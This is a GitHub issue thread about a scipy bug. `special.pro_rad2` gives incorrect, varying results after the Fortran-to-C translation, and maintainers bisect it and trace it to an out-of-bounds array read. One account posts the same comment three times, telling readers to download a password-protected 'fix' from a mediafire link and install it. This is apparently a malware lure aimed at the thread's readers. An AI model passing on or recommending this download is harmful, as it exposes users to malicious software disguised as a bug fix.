### ISSUE TITLE
BUG: `special.pro_rad2`: incorrect results since translation from Fortran

### ISSUE THREAD

**Issue by gavinmacaulay** [scipy/scipy#21461]
### Describe your issue.

In scipy 1.14.1, special function pro_rad2 returns incorrect values. In addition, multiple calls to pro_rad2 with the same input parameters will return differing results.

For `pro_rad2(0, 0, 3, 1.02)[0]`, 1.7434 is returned (or sometimes 3.4867, twice 1.7434). From tables in Flammer (https://github.com/scipy/scipy/issues/13968#issuecomment-831938400), the result should be -0.3422. 

I have Matlab code that looks to be using the same algorithms as scipy's C++ functions for pro_rad2() and this returns -0.3509, so similar to Flammer. I if try pro_rad2 in scipy v1.12, I get -0.3509, the same as the Matlab code. I understand that v1.12 is from before the translation of the spheroidal wave functions from Fortran to C++ (so perhaps a similar cause as #21058?).

The derivatives that pro_rad2() returns are also incorrect when compared to Flammer or the Matlab code.

### Reproducing Code Example

```python
from scipy.special import pro_rad2

for _ in range(30):
    print(pro_rad2(0, 0, 3, 1.02)[0])
```

### Error message

```shell
No error message generated.
```

### SciPy/NumPy/Python version and system information

```shell
1.14.1 1.26.4 sys.version_info(major=3, minor=11, micro=9, releaselevel='final', serial=0)
Build Dependencies:
  blas:
    detection method: pkgconfig
    found: true
    include directory: C:/Users/GavinMacaulay/miniforge3/envs/aqualyd/Library/include
    lib directory: C:/Users/GavinMacaulay/miniforge3/envs/aqualyd/Library/lib
    name: blas
    openblas configuration: unknown
    pc file directory: C:\bld\scipy-split_1724327218051\_h_env\Library\lib\pkgconfig
    version: 3.9.0
  lapack:
    detection method: pkgconfig
    found: true
    include directory: C:/Users/GavinMacaulay/miniforge3/envs/aqualyd/Library/include
    lib directory: C:/Users/GavinMacaulay/miniforge3/envs/aqualyd/Library/lib
    name: lapack
    openblas configuration: unknown
    pc file directory: C:\bld\scipy-split_1724327218051\_h_env\Library\lib\pkgconfig
    version: 3.9.0
  pybind11:
    detection method: pkgconfig
    include directory: C:/Users/GavinMacaulay/miniforge3/envs/aqualyd/Library/include
    name: pybind11
    version: 2.13.4
Compilers:
  c:
    commands: clang-cl
    linker: lld-link
    linker args: -Wl,-defaultlib:C:/bld/scipy-split_1724327218051/_build_env/lib/clang/19/lib/windows/clang_rt.builtins-x86_64.lib
    name: clang-cl
    version: 19.1.0-rc2
  c++:
    commands: clang-cl
    linker: lld-link
    linker args: -Wl,-defaultlib:C:/bld/scipy-split_1724327218051/_build_env/lib/clang/19/lib/windows/clang_rt.builtins-x86_64.lib
    name: clang-cl
    version: 19.1.0-rc2
  cython:
    commands: cython
    linker: cython
    name: cython
    version: 3.0.11
  fortran:
    args: -D_CRT_SECURE_NO_WARNINGS, -fms-runtime-lib=dll, -fuse-ld=lld, -IC:\bld\scipy-split_1724327218051\_h_env\Library\include
    commands: flang-new
    linker: lld-link
    linker args: -Wl,-defaultlib:C:/bld/scipy-split_1724327218051/_build_env/lib/clang/19/lib/windows/clang_rt.builtins-x86_64.lib,
      -D_CRT_SECURE_NO_WARNINGS, -fms-runtime-lib=dll, -fuse-ld=lld, -IC:\bld\scipy-split_1724327218051\_h_env\Library\include
    name: llvm-flang
    version: 19.1.0-rc2
  pythran:
    include directory: ..\..\_h_env\Lib\site-packages\pythran
    version: 0.16.1
Machine Information:
  build:
    cpu: x86_64
    endian: little
    family: x86_64
    system: windows
  cross-compiled: false
  host:
    cpu: x86_64
    endian: little
    family: x86_64
    system: windows
Python Information:
  path: C:\bld\scipy-split_1724327218051\_h_env\python.exe
  version: '3.11'
```

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mdhaber** [comment]
I tried twice to bisect this but ran into apparently flaky behavior eveb before [d1e37b0](https://github.com/scipy/scipy/commit/d1e37b054ece23f3abaf338e1f049abf08a886bc).

**Comment by lucascolley** [comment]
```
(scipy) lucascolley@arm64-apple-darwin20 scipy % git bisect bad  
d1e37b054ece23f3abaf338e1f049abf08a886bc is the first bad commit
commit d1e37b054ece23f3abaf338e1f049abf08a886bc
Author: Ilhan Polat <ilhanpolat@gmail.com>
Date:   Mon Feb 19 15:19:23 2024 +0100

    ENH:Rewrite specfun F77 code in C (#19824)
```

**Comment by mdhaber** [comment]
Ok that would have been my guess. @ilayn maybe this is indeed similar to gh-21058 as suggested in the top post?

**Comment by inkydragon** [comment]
This seems a bug in original f77 code, a direct translation will cause the array to be read out of bounds.

```c
// ctx
ki = 0
nm3 = 28
```

https://github.com/scipy/scipy/blob/10807c0b1fa1f5ff57bc7866a88e738e4d58aee8/scipy/special/xsf/specfun/specfun.h#L5116-L5118

- ctx: `DN` start from `1`, `PM` start from `0`
https://github.com/scipy/scipy/blob/9d08eb58205fb669ff72c60080b18be61b14d8e1/scipy/special/specfun/specfun.f#L600-L601
https://github.com/scipy/scipy/blob/9d08eb58205fb669ff72c60080b18be61b14d8e1/scipy/special/specfun/specfun.f#L670-L672

If I add a `PRINT` in the loop, f77 code will output `NaN`.
